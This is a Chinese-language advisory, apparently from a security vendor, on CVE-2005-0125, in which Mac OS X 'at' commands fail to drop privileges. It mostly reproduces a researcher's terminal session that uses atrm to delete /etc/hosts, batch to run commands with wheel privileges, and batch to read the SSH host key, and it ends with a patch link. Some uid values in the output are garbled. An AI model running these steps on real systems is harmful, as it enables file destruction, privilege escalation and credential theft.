安全研究
安全漏洞
Apple OSX多个应用程序安全漏洞
发布日期:2005-01-26
更新日期:2005-02-04
受影响系统:
Apple MacOS X Server 10.3.7描述:
Apple MacOS X 10.3.7
BUGTRAQ ID: 12297
CVE(CAN) ID: CVE-2005-0125
Mac OS X是一款基于BSD的操作系统。
Mac OS X包含的at相关的多个命令没有正确丢弃权限,本地攻击者可以利用这些漏洞删除文件,运行任意命令,读取敏感信息。
'atrm'可以用于删除系统任意文件:
CrunkJuice:~ kevinfinisterre$ id
uidP1(kevinfinisterre) gidP1(kevinfinisterre) groupsP1(kevinfinisterre),
79(appserverusr), 80(admin), 81(appserveradm)
CrunkJuice:~ kevinfinisterre$ rm /etc/hosts
override rw-r--r-- root/wheel for /etc/hosts? y
rm: /etc/hosts: Permission denied
CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
-rw-r--r-- 1 root wheel 214 3 Dec 20:19 /etc/hosts
CrunkJuice:~ kevinfinisterre$ atrm /etc/hosts
CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
ls: /etc/hosts: No such file or directory
'batch'可以用于以gid=0(wheel) groups=0(wheel), 1(daemon),
2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)特权执行任意命令:
CrunkJuice:/tmp kevinfinisterre$ echo > aa
/usr/bin/id > /tmp/test
CrunkJuice:/tmp kevinfinisterre$ batch -f /tmp/aa 0
Job b0118490c.000 will be executed using /bin/sh
CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
cat: /tmp/test: No such file or directory
(wait 5 minutes)
CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
uidP1(kevinfinisterre) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys),
4(tty), 5(operator), 20(staff), 31(guest), 80(admin)
'batch'也可以用于读取系统任意文件:
CrunkJuice:~ kevinfinisterre$ cat /etc/ssh_host_dsa_key
cat: /etc/ssh_host_dsa_key: Permission denied
CrunkJuice:~ kevinfinisterre$ ls -al /etc/ssh_host_dsa_key
-rw------- 1 root wheel 668 16 Nov 19:39 /etc/ssh_host_dsa_key
CrunkJuice:~ kevinfinisterre$ batch -f /etc/ssh_host_dsa_key
Job b011848db.000 will be executed using /bin/sh
CrunkJuice:~ kevinfinisterre$ ls -al /var/at/jobs/b011848db.000
-rwx------ 1 kevinfin wheel 1263 3 Dec 20:31 /var/at/jobs/b011848db.000
CrunkJuice:~ kevinfinisterre$ cat /var/at/jobs/b011848db.000
#! /bin/sh
# mail root 0
umask 22
TERM_PROGRAM=Apple\_Terminal; export TERM_PROGRAM
SHELL=\/bin\/bash; export SHELL
TERM_PROGRAM_VERSION0; export TERM_PROGRAM_VERSION
OLDPWD=\/var\/at\/jobs; export OLDPWD
USER=kevinfinisterre; export USER
__CF_USER_TEXT_ENCODING=0x1F5\:0\:0; export __CF_USER_TEXT_ENCODING
PATH=\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin; export PATH
PWD=\/Users\/kevinfinisterre; export PWD
SHLVL=1; export SHLVL
HOME=\/Users\/kevinfinisterre; export HOME
LOGNAME=kevinfinisterre; export LOGNAME
SECURITYSESSIONID ee50; export SECURITYSESSIONID
cd /Users/kevinfinisterre
<*来源:Kevin Finisterre (dotslash@snosoft.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110685027017411&w=2
*>
建议:
厂商补丁:
Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.apple.com/support/downloads/securityupdate2005001macosx1028client.html
浏览次数:3026
严重程度:0(网友投票)
绿盟科技给您安全的保障